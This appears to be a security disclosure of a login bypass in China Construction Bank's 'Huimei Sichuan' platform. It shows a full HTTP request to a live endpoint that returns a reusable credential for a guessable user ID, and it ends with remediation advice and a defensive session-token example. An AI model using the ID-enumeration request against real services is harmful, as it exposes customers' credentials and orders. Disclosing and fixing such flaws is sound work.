Login bypass vulnerability in "Huimei Sichuan" (惠美四川)
Background
"Huimei Sichuan" is a promotional-activity platform developed by the Sichuan Provincial Branch of China Construction Bank. Users can log in to it from the CCB Life (建行生活) app and from WeChat.
Vulnerability details
"Huimei Sichuan" exposes an API that looks up a user's identity information by user ID (Pltfrm_Usr_ID): /cnmsmp/branch/distributing/v1/queryUsrInfByPltfrmInfV2P1 . The response includes the credential (Prvt_Ctrct_ID) that is used to call the platform's other APIs.
Pltfrm_Usr_ID is the CCB Life app user ID. These IDs follow a discernible pattern, so a batch of Pltfrm_Usr_ID values can be generated and tried against this API.

```http
POST /cnmsmp/branch/distributing/v1/queryUsrInfByPltfrmInfV2P1 HTTP/2
Host: lsjr.ccb.com
Content-Length: 192
User-Agent: Mozilla/5.0 (Linux; Android 10; M2007J3SC Build/QKQ1.200419.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.101 Mobile Safari/537.36/CloudMercWebView
Content-Type: application/json
Accept: */*
Origin: https://scqy.ccb.com
X-Requested-With: com.ccb.longjiLife
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://scqy.ccb.com/hmscmob/index?ccbParamSJ=SC9OOGxjMGVUMDFydmE2eng2VmplNEVaSytpSnBNWHFRdXdiRTEyeHlNeW5Qb2IwNEprYkM4Rm1xNWI5b0Z0UXF2NTFwbmV4a0tSKytpK3FxWGdqOVUyM1RrZjZpdy80eE5iNzV6a0M4eUhIT2YyVHU4NHVYM1Z3NlJjTmhWWi9nYlQvaldnOEVvSkZSbmgzdDRXSU13RjIvbk1QZk5lY0YvemhyUnNOMnlGVk42cVI1QU93dGc0RGMzaWlDSWdMWlhIWWg1eFNWcHlqaWJZSk80R0IzbU5zVnN5NjZqeVVIN0lzaGRFK3RFVUJodGh4TzNWWm9seVJ3ZzhESUVxZ1BiWnptM3h4U0U1bkVhZWI5dlZJOWQ5YXR2Sk9WN1RIbmF1a1E4WUlHd1F4NENITUZpeC9icFc4ZzkyYW5DcVNOZ2hDN1RKRi9RMi8rYkxxMGN5Wk9BPT0=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

{"Jssdk_Version":"2.3.3","AuthCD":"ol14Gmyy3xdgk8ZQh1zX5hNLGVyGTcpU","AuthUrlCD":"1ux3Ey5nZUIy9XdCJ19kkeUr666vl1Zq","Pltfrm_TpCd":"3","Pltfrm_Usr_ID":"YSM202207179882457","pltfrmUnionId":null}
```

Using the obtained credential (Prvt_Ctrct_ID), the order-list API can then be called:

Remediation suggestions
- Work with CCB Life to change the way Pltfrm_Usr_ID values are generated.
- Testing showed that Prvt_Ctrct_ID is fixed for each user. A fixed Prvt_Ctrct_ID should not be used as an API credential; instead, a random token should be generated when the user logs in.
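The second suggestion above calls for a random per-login token in place of the fixed Prvt_Ctrct_ID. The following is an added Python example, not code from the platform or from this report, of such a token store: it assumes an in-memory dict as the backing store, a 30-minute session lifetime, and that only the SHA-256 of each token is persisted, so a stolen or guessed user ID never yields a usable credential.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

TOKEN_TTL_SECONDS = 30 * 60  # assumed session lifetime


@dataclass
class Session:
    user_id: str
    expires_at: float


class SessionStore:
    """Issue a fresh random token on every login and map it back to a user.

    Unlike a fixed per-user credential such as Prvt_Ctrct_ID, the token is
    unrelated to the user ID, so enumerating Pltfrm_Usr_ID values does not
    produce anything that can authenticate to the other APIs.
    """

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        # keyed by SHA-256 of the token; a leaked store does not expose live tokens
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: str) -> str:
        # 32 bytes from the OS CSPRNG, new on every login
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = Session(user_id, self._clock() + TOKEN_TTL_SECONDS)
        return token

    def resolve(self, token: str) -> Optional[str]:
        """Return the user bound to token, or None if unknown, revoked or expired."""
        key = self._key(token)
        session = self._sessions.get(key)
        if session is None:
            return None
        if session.expires_at <= self._clock():
            del self._sessions[key]  # lazy expiry
            return None
        return session.user_id

    def revoke(self, token: str) -> None:
        """Invalidate a token on logout; a later login issues a different one."""
        self._sessions.pop(self._key(token), None)
```

Each login yields a new token, and an expired or revoked token resolves to no user, so the credential a client holds is tied to a session rather than permanently to the account.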